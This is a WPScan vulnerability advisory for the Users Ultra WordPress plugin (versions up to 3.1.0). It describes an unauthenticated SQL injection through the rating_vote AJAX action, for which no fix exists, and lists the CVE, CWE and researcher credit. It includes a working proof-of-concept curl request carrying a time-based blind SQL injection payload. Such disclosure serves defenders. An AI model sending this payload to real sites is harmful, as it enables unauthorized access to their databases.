WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Users Ultra <= 3.1.0 - Unauthenticated SQL Injection

Description

The plugin fails to properly sanitize and escape the data_target parameter before it is being interpolated in an SQL statement and then executed via the rating_vote AJAX action (available to both unauthenticated and authenticated users), leading to an SQL Injection.

Proof of Concept

curl https://example.com/wp-admin/admin-ajax.php --data 'action=rating_vote&data_id=1&data_target=vote_score+%3d+1+AND+(SELECT+3+FROM+(SELECT(SLEEP(5)))gwe)--+'

Affects Plugins

users-ultra
No known fix - plugin closed

References

CVE
CVE-2022-0769

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

cydave

Submitter

cydave

Submitter website
https://cyllective.com/
Submitter twitter
cyllective
Verified

Yes

WPVDB ID
05eab45d-ebe9-440f-b9c3-73ec40ef1141

Timeline

Publicly Published

2022-03-29 (about 3 months ago)

Added

2022-03-29 (about 3 months ago)

Last Updated

2022-04-13 (about 2 months ago)

Our Other Services

WPScan WordPress Security Plugin